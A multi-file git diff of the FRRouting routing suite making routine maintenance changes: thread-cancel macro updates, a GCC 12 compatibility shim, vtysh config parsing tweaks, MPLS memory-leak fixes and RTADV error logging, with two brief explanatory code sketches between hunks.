diff --git a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py
index 4cb3747c56..ec97c254d1 100644
--- a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py
+++ b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py
@@ -57,6 +57,8 @@ from lib.ospf import (
create_router_ospf,
)
+pytestmark = [pytest.mark.ospfd]
+
# Global variables
topo = None
Iters = 5
diff --git a/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py b/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py
index 3967f5f42a..59ba8236c7 100644
--- a/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py
+++ b/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py
@@ -68,6 +68,7 @@ from lib.ospf import (
verify_ospf_summary,
)
+pytestmark = [pytest.mark.ospfd, pytest.mark.staticd]
# Global variables
topo = None
diff --git a/tools/gcc-plugins/frr-format.c b/tools/gcc-plugins/frr-format.c
index e9f397f225..0a24b091a3 100644
--- a/tools/gcc-plugins/frr-format.c
+++ b/tools/gcc-plugins/frr-format.c
@@ -1042,7 +1042,7 @@ check_format_info (function_format_info *info, tree params,
format_ctx.arglocs = arglocs;
check_function_arguments_recurse (check_format_arg, &format_ctx,
- format_tree, arg_num);
+ format_tree, arg_num, OPT_Wformat_);
location_t loc = format_ctx.res->format_string_loc;
diff --git a/tools/gcc-plugins/gcc-common.h b/tools/gcc-plugins/gcc-common.h
index ec45de1a53..9f59447d63 100644
--- a/tools/gcc-plugins/gcc-common.h
+++ b/tools/gcc-plugins/gcc-common.h
@@ -982,4 +982,9 @@ static inline void debug_gimple_stmt(const_gimple s)
#define SET_DECL_MODE(decl, mode) DECL_MODE(decl) = (mode)
#endif
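+/*
+ * GCC 12 passes an additional warning-option argument to
+ * check_function_arguments_recurse(); on older compilers this wrapper drops
+ * it so callers can always use the newer five-argument form.
+ */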
+#if BUILDING_GCC_VERSION < 12000
+#define check_function_arguments_recurse(arg, ctx, tree, num, opt) \
+ check_function_arguments_recurse(arg, ctx, tree, num)
+#endif
+
#endif
diff --git a/vrrpd/vrrp.c b/vrrpd/vrrp.c
index 3081c0d955..4a0356411f 100644
--- a/vrrpd/vrrp.c
+++ b/vrrpd/vrrp.c
@@ -985,7 +985,7 @@ static int vrrp_recv_advertisement(struct vrrp_router *r, struct ipaddr *src,
*/
static void vrrp_read(struct thread *thread)
{
- struct vrrp_router *r = thread->arg;
+ struct vrrp_router *r = THREAD_ARG(thread);
struct vrrp_pkt *pkt;
ssize_t pktsize;
@@ -1480,7 +1480,7 @@ static void vrrp_change_state(struct vrrp_router *r, int to)
*/
static void vrrp_adver_timer_expire(struct thread *thread)
{
- struct vrrp_router *r = thread->arg;
+ struct vrrp_router *r = THREAD_ARG(thread);
DEBUGD(&vrrp_dbg_proto,
VRRP_LOGPFX VRRP_LOGPFX_VRID VRRP_LOGPFX_FAM
@@ -1508,7 +1508,7 @@ static void vrrp_adver_timer_expire(struct thread *thread)
*/
static void vrrp_master_down_timer_expire(struct thread *thread)
{
- struct vrrp_router *r = thread->arg;
+ struct vrrp_router *r = THREAD_ARG(thread);
zlog_info(VRRP_LOGPFX VRRP_LOGPFX_VRID VRRP_LOGPFX_FAM
"Master_Down_Timer expired",
diff --git a/vtysh/vtysh.c b/vtysh/vtysh.c
index 21bd2f4883..f39ecf0709 100644
--- a/vtysh/vtysh.c
+++ b/vtysh/vtysh.c
@@ -51,6 +51,7 @@
#include "frrstr.h"
#include "json.h"
#include "ferr.h"
+#include "bgpd/bgp_vty.h"
DEFINE_MTYPE_STATIC(MVTYSH, VTYSH_CMD, "Vtysh cmd copy");
@@ -885,10 +886,23 @@ int vtysh_config_from_file(struct vty *vty, FILE *fp)
int lineno = 0;
/* once we have an error, we remember & return that */
int retcode = CMD_SUCCESS;
+ char *vty_buf_copy = XCALLOC(MTYPE_VTYSH_CMD, VTY_BUFSIZ);
+ char *vty_buf_trimmed = NULL;
while (fgets(vty->buf, VTY_BUFSIZ, fp)) {
lineno++;
+ strlcpy(vty_buf_copy, vty->buf, VTY_BUFSIZ);
+ vty_buf_trimmed = trim(vty_buf_copy);
+
+ /*
+ * Ignore the "end" lines, we will generate these where
+ * appropriate, otherwise we never execute
+ * XFRR_end_configuration, and start/end markers do not work.
+ */
+ if (strmatch(vty_buf_trimmed, "end"))
+ continue;
+
ret = command_config_read_one_line(vty, &cmd, lineno, 1);
switch (ret) {
@@ -955,6 +969,8 @@ int vtysh_config_from_file(struct vty *vty, FILE *fp)
}
}
+ XFREE(MTYPE_VTYSH_CMD, vty_buf_copy);
+
return (retcode);
}
@@ -1685,8 +1701,8 @@ DEFUNSH(VTYSH_BGPD, router_bgp, router_bgp_cmd,
DEFUNSH(VTYSH_BGPD, address_family_vpnv4, address_family_vpnv4_cmd,
"address-family vpnv4 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV4_NODE;
return CMD_SUCCESS;
@@ -1695,8 +1711,8 @@ DEFUNSH(VTYSH_BGPD, address_family_vpnv4, address_family_vpnv4_cmd,
DEFUNSH(VTYSH_BGPD, address_family_vpnv6, address_family_vpnv6_cmd,
"address-family vpnv6 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV6_NODE;
return CMD_SUCCESS;
@@ -1706,8 +1722,8 @@ DEFUNSH(VTYSH_BGPD, address_family_vpnv6, address_family_vpnv6_cmd,
DEFUNSH(VTYSH_BGPD, address_family_ipv4, address_family_ipv4_cmd,
"address-family ipv4 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family Modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV4_NODE;
return CMD_SUCCESS;
@@ -1716,8 +1732,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4, address_family_ipv4_cmd,
DEFUNSH(VTYSH_BGPD, address_family_flowspecv4, address_family_flowspecv4_cmd,
"address-family ipv4 flowspec",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family Modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_FLOWSPECV4_NODE;
return CMD_SUCCESS;
@@ -1726,8 +1742,8 @@ DEFUNSH(VTYSH_BGPD, address_family_flowspecv4, address_family_flowspecv4_cmd,
DEFUNSH(VTYSH_BGPD, address_family_flowspecv6, address_family_flowspecv6_cmd,
"address-family ipv6 flowspec",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family Modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_FLOWSPECV6_NODE;
return CMD_SUCCESS;
@@ -1736,8 +1752,8 @@ DEFUNSH(VTYSH_BGPD, address_family_flowspecv6, address_family_flowspecv6_cmd,
DEFUNSH(VTYSH_BGPD, address_family_ipv4_multicast,
address_family_ipv4_multicast_cmd, "address-family ipv4 multicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV4M_NODE;
return CMD_SUCCESS;
@@ -1746,8 +1762,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4_multicast,
DEFUNSH(VTYSH_BGPD, address_family_ipv4_vpn, address_family_ipv4_vpn_cmd,
"address-family ipv4 vpn",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV4_NODE;
return CMD_SUCCESS;
@@ -1757,8 +1773,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4_labeled_unicast,
address_family_ipv4_labeled_unicast_cmd,
"address-family ipv4 labeled-unicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV4L_NODE;
return CMD_SUCCESS;
@@ -1767,8 +1783,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4_labeled_unicast,
DEFUNSH(VTYSH_BGPD, address_family_ipv6, address_family_ipv6_cmd,
"address-family ipv6 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV6_NODE;
return CMD_SUCCESS;
@@ -1777,8 +1793,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv6, address_family_ipv6_cmd,
DEFUNSH(VTYSH_BGPD, address_family_ipv6_multicast,
address_family_ipv6_multicast_cmd, "address-family ipv6 multicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV6M_NODE;
return CMD_SUCCESS;
@@ -1787,8 +1803,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv6_multicast,
DEFUNSH(VTYSH_BGPD, address_family_ipv6_vpn, address_family_ipv6_vpn_cmd,
"address-family ipv6 vpn",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV6_NODE;
return CMD_SUCCESS;
@@ -1798,8 +1814,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv6_labeled_unicast,
address_family_ipv6_labeled_unicast_cmd,
"address-family ipv6 labeled-unicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV6L_NODE;
return CMD_SUCCESS;
@@ -1863,8 +1879,8 @@ DEFUNSH(VTYSH_BGPD,
DEFUNSH(VTYSH_BGPD, address_family_evpn, address_family_evpn_cmd,
"address-family <l2vpn evpn>",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_EVPN_NODE;
return CMD_SUCCESS;
diff --git a/zebra/irdp_main.c b/zebra/irdp_main.c
index 43478c98f1..65aad49a25 100644
--- a/zebra/irdp_main.c
+++ b/zebra/irdp_main.c
@@ -260,7 +260,7 @@ void irdp_advert_off(struct interface *ifp)
if (!irdp)
return;
- thread_cancel(&irdp->t_advertise);
+ THREAD_OFF(irdp->t_advertise);
if (ifp->connected)
for (ALL_LIST_ELEMENTS(ifp->connected, node, nnode, ifc)) {
@@ -295,7 +295,7 @@ void process_solicit(struct interface *ifp)
return;
irdp->flags |= IF_SOLICIT;
- thread_cancel(&irdp->t_advertise);
+ THREAD_OFF(irdp->t_advertise);
timer = (frr_weak_random() % MAX_RESPONSE_DELAY) + 1;
diff --git a/zebra/kernel_netlink.c b/zebra/kernel_netlink.c
index 31d8294a0f..5c8aca9691 100644
--- a/zebra/kernel_netlink.c
+++ b/zebra/kernel_netlink.c
@@ -1902,7 +1902,7 @@ static void kernel_nlsock_fini(struct nlsock *nls)
void kernel_terminate(struct zebra_ns *zns, bool complete)
{
- thread_cancel(&zns->t_netlink);
+ THREAD_OFF(zns->t_netlink);
kernel_nlsock_fini(&zns->netlink);
diff --git a/zebra/rt_netlink.c b/zebra/rt_netlink.c
index 1d9b59cf73..0eab1fa850 100644
--- a/zebra/rt_netlink.c
+++ b/zebra/rt_netlink.c
@@ -437,10 +437,10 @@ static enum seg6local_action_t
parse_encap_seg6local(struct rtattr *tb,
struct seg6local_context *ctx)
{
- struct rtattr *tb_encap[256] = {};
+ struct rtattr *tb_encap[SEG6_LOCAL_MAX + 1] = {};
enum seg6local_action_t act = ZEBRA_SEG6_LOCAL_ACTION_UNSPEC;
- netlink_parse_rtattr_nested(tb_encap, 256, tb);
+ netlink_parse_rtattr_nested(tb_encap, SEG6_LOCAL_MAX, tb);
if (tb_encap[SEG6_LOCAL_ACTION])
act = *(uint32_t *)RTA_DATA(tb_encap[SEG6_LOCAL_ACTION]);
@@ -465,11 +465,11 @@ parse_encap_seg6local(struct rtattr *tb,
static int parse_encap_seg6(struct rtattr *tb, struct in6_addr *segs)
{
- struct rtattr *tb_encap[256] = {};
+ struct rtattr *tb_encap[SEG6_IPTUNNEL_MAX + 1] = {};
struct seg6_iptunnel_encap *ipt = NULL;
struct in6_addr *segments = NULL;
- netlink_parse_rtattr_nested(tb_encap, 256, tb);
+ netlink_parse_rtattr_nested(tb_encap, SEG6_IPTUNNEL_MAX, tb);
/*
* TODO: Multiple SID lists are not supported.
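Sizing tb_encap as SEG6_LOCAL_MAX + 1 (and SEG6_IPTUNNEL_MAX + 1) matches how nested attribute tables are indexed by attribute type. A self-contained sketch of the parse loop this relies on, assuming it mirrors the helper in zebra/kernel_netlink.c; this is not the real netlink_parse_rtattr_nested():

    #include <linux/rtnetlink.h>
    #include <string.h>

    /* Hedged sketch: attribute types index tb directly, so a table of
     * max + 1 entries covers types 0..max; a 256-entry table only
     * wastes stack. */
    static void parse_rtattr_nested_sketch(struct rtattr **tb, int max,
                                           struct rtattr *rta)
    {
            struct rtattr *attr = RTA_DATA(rta);
            int len = RTA_PAYLOAD(rta);

            memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
            for (; RTA_OK(attr, len); attr = RTA_NEXT(attr, len))
                    if (attr->rta_type <= max)
                            tb[attr->rta_type] = attr;
    }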
diff --git a/zebra/rtadv.c b/zebra/rtadv.c
index 5d4ed1e424..bf959980be 100644
--- a/zebra/rtadv.c
+++ b/zebra/rtadv.c
@@ -830,39 +830,51 @@ static int rtadv_make_socket(ns_id_t ns_id)
int sock = -1;
int ret = 0;
struct icmp6_filter filter;
+ int error;
frr_with_privs(&zserv_privs) {
sock = ns_socket(AF_INET6, SOCK_RAW, IPPROTO_ICMPV6, ns_id);
-
+ /*
+ * frr_with_privs might set errno too if it fails; save
+ * it to the side before anything else can change it
+ */
+ error = errno;
}
if (sock < 0) {
+ zlog_warn("RTADV socket for ns: %u failure to create: %s(%u)",
+ ns_id, safe_strerror(error), error);
return -1;
}
ret = setsockopt_ipv6_pktinfo(sock, 1);
if (ret < 0) {
+ zlog_warn("RTADV failure to set Packet Information");
close(sock);
return ret;
}
ret = setsockopt_ipv6_multicast_loop(sock, 0);
if (ret < 0) {
+ zlog_warn("RTADV failure to set multicast Loop detection");
close(sock);
return ret;
}
ret = setsockopt_ipv6_unicast_hops(sock, 255);
if (ret < 0) {
+ zlog_warn("RTADV failure to set maximum unicast hops");
close(sock);
return ret;
}
ret = setsockopt_ipv6_multicast_hops(sock, 255);
if (ret < 0) {
+ zlog_warn("RTADV failure to set maximum multicast hops");
close(sock);
return ret;
}
ret = setsockopt_ipv6_hoplimit(sock, 1);
if (ret < 0) {
+ zlog_warn("RTADV failure to set maximum incoming hop limit");
close(sock);
return ret;
}
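The rtadv hunk saves errno inside the privilege block because code run when the block exits may overwrite it. A standalone illustration of the same pattern in plain C; nothing below is the FRR API, only the idiom is shown:

    #include <errno.h>
    #include <netinet/in.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/socket.h>

    /* Hedged sketch: copy errno immediately after the failing call,
     * before any cleanup can clobber it, then report the saved copy. */
    static int make_raw_icmpv6_socket(void)
    {
            int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_ICMPV6);
            int saved_errno = errno;

            if (fd < 0) {
                    fprintf(stderr, "socket: %s (%d)\n",
                            strerror(saved_errno), saved_errno);
                    return -1;
            }
            return fd;
    }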
diff --git a/zebra/zebra_dplane.c b/zebra/zebra_dplane.c
index 424cea4673..a4330a3200 100644
--- a/zebra/zebra_dplane.c
+++ b/zebra/zebra_dplane.c
@@ -6043,8 +6043,8 @@ static void dplane_check_shutdown_status(struct thread *event)
zns_info_list_del(&zdplane_info.dg_zns_list, zi);
if (zdplane_info.dg_master) {
- thread_cancel(&zi->t_read);
- thread_cancel(&zi->t_request);
+ THREAD_OFF(zi->t_read);
+ THREAD_OFF(zi->t_request);
}
XFREE(MTYPE_DP_NS, zi);
diff --git a/zebra/zebra_evpn_mac.c b/zebra/zebra_evpn_mac.c
index 38a36cc7ae..cbdc17653b 100644
--- a/zebra/zebra_evpn_mac.c
+++ b/zebra/zebra_evpn_mac.c
@@ -374,8 +374,9 @@ static char *zebra_evpn_zebra_mac_flag_dump(struct zebra_mac *mac, char *buf,
: "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_DUPLICATE) ? "DUP " : "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_FPM_SENT) ? "FPM " : "",
- CHECK_FLAG(mac->flags, ZEBRA_MAC_ES_PEER_ACTIVE) ? "LOC Active "
- : "",
+ CHECK_FLAG(mac->flags, ZEBRA_MAC_ES_PEER_ACTIVE)
+ ? "PEER Active "
+ : "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_ES_PEER_PROXY) ? "PROXY " : "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_LOCAL_INACTIVE)
? "LOC Inactive "
diff --git a/zebra/zebra_fpm.c b/zebra/zebra_fpm.c
index 39b7156ce4..21acaa823c 100644
--- a/zebra/zebra_fpm.c
+++ b/zebra/zebra_fpm.c
@@ -496,7 +496,7 @@ static inline void zfpm_write_on(void)
*/
static inline void zfpm_read_off(void)
{
- thread_cancel(&zfpm_g->t_read);
+ THREAD_OFF(zfpm_g->t_read);
}
/*
@@ -504,12 +504,12 @@ static inline void zfpm_read_off(void)
*/
static inline void zfpm_write_off(void)
{
- thread_cancel(&zfpm_g->t_write);
+ THREAD_OFF(zfpm_g->t_write);
}
static inline void zfpm_connect_off(void)
{
- thread_cancel(&zfpm_g->t_connect);
+ THREAD_OFF(zfpm_g->t_connect);
}
/*
@@ -583,7 +583,7 @@ static void zfpm_connection_up(const char *detail)
/*
* Start thread to push existing routes to the FPM.
*/
- thread_cancel(&zfpm_g->t_conn_up);
+ THREAD_OFF(zfpm_g->t_conn_up);
zfpm_rnodes_iter_init(&zfpm_g->t_conn_up_state.iter);
zfpm_g->fpm_mac_dump_done = false;
@@ -1687,7 +1687,7 @@ static void zfpm_stop_stats_timer(void)
return;
zfpm_debug("Stopping existing stats timer");
- thread_cancel(&zfpm_g->t_stats);
+ THREAD_OFF(zfpm_g->t_stats);
}
/*
diff --git a/zebra/zebra_mpls.c b/zebra/zebra_mpls.c
index 772e30833c..41f85af635 100644
--- a/zebra/zebra_mpls.c
+++ b/zebra/zebra_mpls.c
@@ -1142,6 +1142,21 @@ static void lsp_check_free(struct hash *lsp_table, struct zebra_lsp **plsp)
lsp_free(lsp_table, plsp);
}
+static void lsp_free_nhlfe(struct zebra_lsp *lsp)
+{
+ struct zebra_nhlfe *nhlfe;
+
+ while ((nhlfe = nhlfe_list_first(&lsp->nhlfe_list))) {
+ nhlfe_list_del(&lsp->nhlfe_list, nhlfe);
+ nhlfe_free(nhlfe);
+ }
+
+ while ((nhlfe = nhlfe_list_first(&lsp->backup_nhlfe_list))) {
+ nhlfe_list_del(&lsp->backup_nhlfe_list, nhlfe);
+ nhlfe_free(nhlfe);
+ }
+}
+
/*
* Dtor for an LSP: remove from ile hash, release any internal allocations,
* free LSP object.
@@ -1149,7 +1164,6 @@ static void lsp_check_free(struct hash *lsp_table, struct zebra_lsp **plsp)
static void lsp_free(struct hash *lsp_table, struct zebra_lsp **plsp)
{
struct zebra_lsp *lsp;
- struct zebra_nhlfe *nhlfe;
if (plsp == NULL || *plsp == NULL)
return;
@@ -1160,13 +1174,7 @@ static void lsp_free(struct hash *lsp_table, struct zebra_lsp **plsp)
zlog_debug("Free LSP in-label %u flags 0x%x",
lsp->ile.in_label, lsp->flags);
- /* Free nhlfes, if any. */
- frr_each_safe(nhlfe_list, &lsp->nhlfe_list, nhlfe)
- nhlfe_del(nhlfe);
-
- /* Free backup nhlfes, if any. */
- frr_each_safe(nhlfe_list, &lsp->backup_nhlfe_list, nhlfe)
- nhlfe_del(nhlfe);
+ lsp_free_nhlfe(lsp);
hash_release(lsp_table, &lsp->ile);
XFREE(MTYPE_LSP, lsp);
@@ -3669,6 +3677,7 @@ int zebra_mpls_static_lsp_del(struct zebra_vrf *zvrf, mpls_label_t in_label,
*/
if (nhlfe_list_first(&lsp->nhlfe_list) == NULL) {
lsp = hash_release(slsp_table, &tmp_ile);
+ lsp_free_nhlfe(lsp);
XFREE(MTYPE_LSP, lsp);
}
@@ -4005,6 +4014,15 @@ void zebra_mpls_client_cleanup_vrf_label(uint8_t proto)
}
}
+static void lsp_table_free(void *p)
+{
+ struct zebra_lsp *lsp = p;
+
+ lsp_free_nhlfe(lsp);
+
+ XFREE(MTYPE_LSP, lsp);
+}
+
/*
* Called upon process exiting, need to delete LSP forwarding
* entries from the kernel.
@@ -4013,9 +4031,9 @@ void zebra_mpls_client_cleanup_vrf_label(uint8_t proto)
void zebra_mpls_close_tables(struct zebra_vrf *zvrf)
{
hash_iterate(zvrf->lsp_table, lsp_uninstall_from_kernel, NULL);
- hash_clean(zvrf->lsp_table, NULL);
+ hash_clean(zvrf->lsp_table, lsp_table_free);
hash_free(zvrf->lsp_table);
- hash_clean(zvrf->slsp_table, NULL);
+ hash_clean(zvrf->slsp_table, lsp_table_free);
hash_free(zvrf->slsp_table);
route_table_finish(zvrf->fec_table[AFI_IP]);
route_table_finish(zvrf->fec_table[AFI_IP6]);
diff --git a/zebra/zebra_netns_notify.c b/zebra/zebra_netns_notify.c
index b3cb061242..6ad54d5c50 100644
--- a/zebra/zebra_netns_notify.c
+++ b/zebra/zebra_netns_notify.c
@@ -413,7 +413,7 @@ void zebra_ns_notify_close(void)
fd = zebra_netns_notify_current->u.fd;
if (zebra_netns_notify_current->master != NULL)
- thread_cancel(&zebra_netns_notify_current);
+ THREAD_OFF(zebra_netns_notify_current);
/* auto-removal of notify items */
if (fd > 0)
diff --git a/zebra/zebra_opaque.c b/zebra/zebra_opaque.c
index 3d757566e0..d18c5fd5eb 100644
--- a/zebra/zebra_opaque.c
+++ b/zebra/zebra_opaque.c
@@ -247,7 +247,7 @@ uint32_t zebra_opaque_enqueue_batch(struct stream_fifo *batch)
/* Dequeue messages from the incoming batch, and save them
* on the module fifo.
*/
- frr_with_mutex(&zo_info.mutex) {
+ frr_with_mutex (&zo_info.mutex) {
msg = stream_fifo_pop(batch);
while (msg) {
stream_fifo_push(&zo_info.in_fifo, msg);
@@ -288,7 +288,7 @@ static void process_messages(struct thread *event)
* Dequeue some messages from the incoming queue, temporarily
* save them on the local fifo
*/
- frr_with_mutex(&zo_info.mutex) {
+ frr_with_mutex (&zo_info.mutex) {
for (i = 0; i < zo_info.msgs_per_cycle; i++) {
msg = stream_fifo_pop(&zo_info.in_fifo);
diff --git a/zebra/zebra_ptm.c b/zebra/zebra_ptm.c
index 3127d2d304..4a18eb021e 100644
--- a/zebra/zebra_ptm.c
+++ b/zebra/zebra_ptm.c
@@ -157,9 +157,9 @@ void zebra_ptm_finish(void)
free(ptm_cb.in_data);
/* Cancel events. */
- thread_cancel(&ptm_cb.t_read);
- thread_cancel(&ptm_cb.t_write);
- thread_cancel(&ptm_cb.t_timer);
+ THREAD_OFF(ptm_cb.t_read);
+ THREAD_OFF(ptm_cb.t_write);
+ THREAD_OFF(ptm_cb.t_timer);
if (ptm_cb.wb)
buffer_free(ptm_cb.wb);
@@ -213,7 +213,7 @@ static int zebra_ptm_send_message(char *data, int size)
ptm_cb.reconnect_time, &ptm_cb.t_timer);
return -1;
case BUFFER_EMPTY:
- thread_cancel(&ptm_cb.t_write);
+ THREAD_OFF(ptm_cb.t_write);
break;
case BUFFER_PENDING:
thread_add_write(zrouter.master, zebra_ptm_flush_messages, NULL,
diff --git a/zebra/zebra_pw.c b/zebra/zebra_pw.c
index 7d1153f21f..6dde513f40 100644
--- a/zebra/zebra_pw.c
+++ b/zebra/zebra_pw.c
@@ -102,7 +102,7 @@ void zebra_pw_del(struct zebra_vrf *zvrf, struct zebra_pw *pw)
hook_call(pw_uninstall, pw);
dplane_pw_uninstall(pw);
} else if (pw->install_retry_timer)
- thread_cancel(&pw->install_retry_timer);
+ THREAD_OFF(pw->install_retry_timer);
/* unlink and release memory */
RB_REMOVE(zebra_pw_head, &zvrf->pseudowires, pw);
@@ -219,7 +219,7 @@ void zebra_pw_install_failure(struct zebra_pw *pw, int pwstatus)
pw->vrf_id, pw->ifname, PW_INSTALL_RETRY_INTERVAL);
/* schedule to retry later */
- thread_cancel(&pw->install_retry_timer);
+ THREAD_OFF(pw->install_retry_timer);
thread_add_timer(zrouter.master, zebra_pw_install_retry, pw,
PW_INSTALL_RETRY_INTERVAL, &pw->install_retry_timer);
diff --git a/zebra/zebra_rib.c b/zebra/zebra_rib.c
index d92a4c2365..d0babbb9e4 100644
--- a/zebra/zebra_rib.c
+++ b/zebra/zebra_rib.c
@@ -4242,7 +4242,7 @@ static void rib_process_dplane_results(struct thread *thread)
TAILQ_INIT(&ctxlist);
/* Take lock controlling queue of results */
- frr_with_mutex(&dplane_mutex) {
+ frr_with_mutex (&dplane_mutex) {
/* Dequeue list of context structs */
dplane_ctx_list_append(&ctxlist, &rib_dplane_q);
}
@@ -4401,7 +4401,7 @@ static void rib_process_dplane_results(struct thread *thread)
static int rib_dplane_results(struct dplane_ctx_q *ctxlist)
{
/* Take lock controlling queue of results */
- frr_with_mutex(&dplane_mutex) {
+ frr_with_mutex (&dplane_mutex) {
/* Enqueue context blocks */
dplane_ctx_list_append(&rib_dplane_q, ctxlist);
}
diff --git a/zebra/zserv.c b/zebra/zserv.c
index 403f6c0d99..f76b29deff 100644
--- a/zebra/zserv.c
+++ b/zebra/zserv.c
@@ -239,7 +239,7 @@ static void zserv_write(struct thread *thread)
cache = stream_fifo_new();
- frr_with_mutex(&client->obuf_mtx) {
+ frr_with_mutex (&client->obuf_mtx) {
while (stream_fifo_head(client->obuf_fifo))
stream_fifo_push(cache,
stream_fifo_pop(client->obuf_fifo));
@@ -432,7 +432,7 @@ static void zserv_read(struct thread *thread)
memory_order_relaxed);
/* publish read packets on client's input queue */
- frr_with_mutex(&client->ibuf_mtx) {
+ frr_with_mutex (&client->ibuf_mtx) {
while (cache->head)
stream_fifo_push(client->ibuf_fifo,
stream_fifo_pop(cache));
@@ -501,7 +501,7 @@ static void zserv_process_messages(struct thread *thread)
uint32_t p2p = zrouter.packets_to_process;
bool need_resched = false;
- frr_with_mutex(&client->ibuf_mtx) {
+ frr_with_mutex (&client->ibuf_mtx) {
uint32_t i;
for (i = 0; i < p2p && stream_fifo_head(client->ibuf_fifo);
++i) {
@@ -531,7 +531,7 @@ static void zserv_process_messages(struct thread *thread)
int zserv_send_message(struct zserv *client, struct stream *msg)
{
- frr_with_mutex(&client->obuf_mtx) {
+ frr_with_mutex (&client->obuf_mtx) {
stream_fifo_push(client->obuf_fifo, msg);
}
@@ -547,7 +547,7 @@ int zserv_send_batch(struct zserv *client, struct stream_fifo *fifo)
{
struct stream *msg;
- frr_with_mutex(&client->obuf_mtx) {
+ frr_with_mutex (&client->obuf_mtx) {
msg = stream_fifo_pop(fifo);
while (msg) {
stream_fifo_push(client->obuf_fifo, msg);
@@ -684,7 +684,7 @@ void zserv_close_client(struct zserv *client)
* Final check in case the client struct is in use in another
* pthread: if not in-use, continue and free the client
*/
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
if (client->busy_count <= 0) {
/* remove from client list */
listnode_delete(zrouter.client_list, client);
@@ -761,7 +761,7 @@ static struct zserv *zserv_client_create(int sock)
}
/* Add this client to linked list. */
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
listnode_add(zrouter.client_list, client);
}
@@ -797,7 +797,7 @@ struct zserv *zserv_acquire_client(uint8_t proto, unsigned short instance,
{
struct zserv *client = NULL;
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client = find_client_internal(proto, instance, session_id);
if (client) {
/* Don't return a dead/closed client object */
@@ -823,7 +823,7 @@ void zserv_release_client(struct zserv *client)
* for it to be deleted as soon as we release the lock, so we won't
* touch the object again.
*/
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client->busy_count--;
if (client->busy_count <= 0) {
@@ -1229,7 +1229,7 @@ struct zserv *zserv_find_client(uint8_t proto, unsigned short instance)
{
struct zserv *client;
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client = find_client_internal(proto, instance, 0);
}
@@ -1244,7 +1244,7 @@ struct zserv *zserv_find_client_session(uint8_t proto, unsigned short instance,
{
struct zserv *client;
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client = find_client_internal(proto, instance, session_id);
}